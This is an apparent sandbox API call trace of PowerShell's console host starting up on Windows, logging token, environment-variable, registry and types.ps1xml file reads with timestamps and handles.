	[0699.009] CheckTokenMembership (in: TokenHandle=0x2f0, SidToCheck=0x2d29c20*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18dba8 | out: IsMember=0x18dba8) returned 1
	[0699.010] CloseHandle (hObject=0x2f0) returned 1
	[0699.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0699.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0699.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0699.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0699.042] CoTaskMemAlloc (cb=0x804) returned 0x1b94aaf0
	[0699.042] GetConsoleTitleW (in: lpConsoleTitle=0x1b94aaf0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0699.297] CoTaskMemFree (pv=0x1b94aaf0) 
	[0699.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0699.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0699.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0699.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0705.670] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0705.670] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0705.670] CoTaskMemFree (pv=0x1b93b8b0) 
	[0705.677] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2f0
	[0705.679] CoCreateGuid (in: pguid=0x18dc90 | out: pguid=0x18dc90*(Data1=0x28beda6, Data2=0x8a20, Data3=0x407f, Data4=([0]=0xab, [1]=0x56, [2]=0xaa, [3]=0xa4, [4]=0x63, [5]=0x86, [6]=0xa0, [7]=0x8e))) returned 0x0
	[0705.681] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0705.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0705.681] CoTaskMemFree (pv=0x1b93b8b0) 
	[0708.221] WinSqmIsOptedIn () returned 0x0
	[0708.222] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0708.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.222] CoTaskMemFree (pv=0x1b93b8b0) 
	[0708.223] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0708.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.223] CoTaskMemFree (pv=0x1b93b8b0) 
	[0708.223] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0708.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.224] CoTaskMemFree (pv=0x1b93b8b0) 
	[0708.224] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0708.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.224] CoTaskMemFree (pv=0x1b93b8b0) 
	[0708.225] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0708.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.225] CoTaskMemFree (pv=0x1b93b8b0) 
	[0708.226] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0708.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.226] CoTaskMemFree (pv=0x1b93b8b0) 
	[0708.227] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0708.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.227] CoTaskMemFree (pv=0x1b93b8b0) 
	[0708.228] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0708.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.228] CoTaskMemFree (pv=0x1b93b8b0) 
	[0708.230] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0708.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.230] CoTaskMemFree (pv=0x1b93b8b0) 
	[0708.235] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0708.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.235] CoTaskMemFree (pv=0x1b93b8b0) 
	[0708.235] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0708.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.235] CoTaskMemFree (pv=0x1b93b8b0) 
	[0708.236] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0708.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.236] CoTaskMemFree (pv=0x1b93b8b0) 
	[0722.079] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0722.079] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0722.080] CoTaskMemFree (pv=0x1b93b8b0) 
	[0723.563] CoTaskMemAlloc (cb=0xcc) returned 0x1b947100
	[0723.563] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b947100, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0723.563] CoTaskMemFree (pv=0x1b947100) 
	[0723.564] CoTaskMemAlloc (cb=0xf0) returned 0x1b938db0
	[0723.564] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b938db0, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0723.564] CoTaskMemFree (pv=0x1b938db0) 
	[0723.564] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d808 | out: phkResult=0x18d808*=0x30c) returned 0x0
	[0723.564] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x18d78c, lpData=0x0, lpcbData=0x18d788*=0x0 | out: lpType=0x18d78c*=0x2, lpData=0x0, lpcbData=0x18d788*=0x6c) returned 0x0
	[0723.564] CoTaskMemAlloc (cb=0x70) returned 0x244190
	[0723.564] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x18d75c, lpData=0x244190, lpcbData=0x18d758*=0x6c | out: lpType=0x18d75c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x18d758*=0x6c) returned 0x0
	[0723.564] CoTaskMemFree (pv=0x244190) 
	[0723.564] CoTaskMemAlloc (cb=0xcc) returned 0x1b947100
	[0723.564] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b947100, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0723.564] CoTaskMemFree (pv=0x1b947100) 
	[0723.564] CoTaskMemAlloc (cb=0xcc) returned 0x1b947100
	[0723.564] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b947100, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0723.565] CoTaskMemFree (pv=0x1b947100) 
	[0723.568] RegCloseKey (hKey=0x30c) returned 0x0
	[0723.568] CoTaskMemAlloc (cb=0xcc) returned 0x1b947100
	[0723.568] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b947100, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0723.568] CoTaskMemFree (pv=0x1b947100) 
	[0723.569] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d808 | out: phkResult=0x18d808*=0x30c) returned 0x0
	[0723.569] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x18d78c, lpData=0x0, lpcbData=0x18d788*=0x0 | out: lpType=0x18d78c*=0x0, lpData=0x0, lpcbData=0x18d788*=0x0) returned 0x2
	[0723.569] RegCloseKey (hKey=0x30c) returned 0x0
	[0723.579] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0723.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.580] CoTaskMemFree (pv=0x1b93b8b0) 
	[0723.582] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0723.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.582] CoTaskMemFree (pv=0x1b93b8b0) 
	[0723.585] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0723.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.586] CoTaskMemFree (pv=0x1b93b8b0) 
	[0723.586] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0723.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.586] CoTaskMemFree (pv=0x1b93b8b0) 
	[0723.587] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d5f8 | out: phkResult=0x18d5f8*=0x30c) returned 0x0
	[0723.588] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x18d60c, lpData=0x0, lpcbData=0x18d608*=0x0 | out: lpType=0x18d60c*=0x1, lpData=0x0, lpcbData=0x18d608*=0x74) returned 0x0
	[0723.588] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x18d57c, lpData=0x0, lpcbData=0x18d578*=0x0 | out: lpType=0x18d57c*=0x1, lpData=0x0, lpcbData=0x18d578*=0x74) returned 0x0
	[0723.589] CoTaskMemAlloc (cb=0x78) returned 0x244190
	[0723.589] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x18d54c, lpData=0x244190, lpcbData=0x18d548*=0x74 | out: lpType=0x18d54c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x18d548*=0x74) returned 0x0
	[0723.589] CoTaskMemFree (pv=0x244190) 
	[0723.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x18d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0723.589] SetErrorMode (uMode=0x1) returned 0x1
	[0723.589] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x18d4d0 | out: lpFileInformation=0x18d4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0723.589] SetErrorMode (uMode=0x1) returned 0x1
	[0723.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0723.590] SetErrorMode (uMode=0x1) returned 0x1
	[0723.590] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d4d0 | out: lpFileInformation=0x18d4d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0723.590] SetErrorMode (uMode=0x1) returned 0x1
	[0723.591] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0723.592] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.592] CoTaskMemFree (pv=0x1b93b8b0) 
	[0723.592] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0723.592] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.593] CoTaskMemFree (pv=0x1b93b8b0) 
	[0723.593] GetACP () returned 0x4e4
	[0723.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0723.602] SetErrorMode (uMode=0x1) returned 0x1
	[0723.603] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0723.604] GetFileType (hFile=0x324) returned 0x1
	[0723.604] SetErrorMode (uMode=0x1) returned 0x1
	[0723.604] GetFileType (hFile=0x324) returned 0x1
	[0725.174] ReadFile (in: hFile=0x324, lpBuffer=0x2cfe9a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2cfe9a0*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0725.175] ReadFile (in: hFile=0x324, lpBuffer=0x2cfe9a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2cfe9a0*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0725.175] ReadFile (in: hFile=0x324, lpBuffer=0x2cfe9a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2cfe9a0*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0725.176] ReadFile (in: hFile=0x324, lpBuffer=0x2cfe9a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2cfe9a0*, lpNumberOfBytesRead=0x18d408*=0xcf3, lpOverlapped=0x0) returned 1
	[0725.176] ReadFile (in: hFile=0x324, lpBuffer=0x2cfddfb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2cfddfb*, lpNumberOfBytesRead=0x18d408*=0x0, lpOverlapped=0x0) returned 1
	[0725.176] ReadFile (in: hFile=0x324, lpBuffer=0x2cfe9a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2cfe9a0*, lpNumberOfBytesRead=0x18d408*=0x0, lpOverlapped=0x0) returned 1
	[0725.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0725.178] SetErrorMode (uMode=0x1) returned 0x1
	[0725.178] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d380 | out: lpFileInformation=0x18d380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0725.179] SetErrorMode (uMode=0x1) returned 0x1
	[0725.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0725.180] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d468 | out: phkResult=0x18d468*=0x324) returned 0x0
	[0725.180] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d3ec, lpData=0x0, lpcbData=0x18d3e8*=0x0 | out: lpType=0x18d3ec*=0x1, lpData=0x0, lpcbData=0x18d3e8*=0x56) returned 0x0
	[0725.180] CoTaskMemAlloc (cb=0x5a) returned 0x2b29d0
	[0725.180] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d3bc, lpData=0x2b29d0, lpcbData=0x18d3b8*=0x56 | out: lpType=0x18d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d3b8*=0x56) returned 0x0
	[0725.180] CoTaskMemFree (pv=0x2b29d0) 
	[0725.180] RegCloseKey (hKey=0x324) returned 0x0
	[0725.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0725.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x18cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0725.199] VirtualQuery (in: lpAddress=0x18c150, lpBuffer=0x18d010, dwLength=0x30 | out: lpBuffer=0x18d010*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0726.758] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0726.759] GetFileType (hFile=0x324) returned 0x1
	[0726.759] SetErrorMode (uMode=0x1) returned 0x1
	[0726.759] GetFileType (hFile=0x324) returned 0x1
	[0726.759] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.760] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.761] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.761] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.762] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.763] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.763] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.763] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.764] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.765] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.765] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
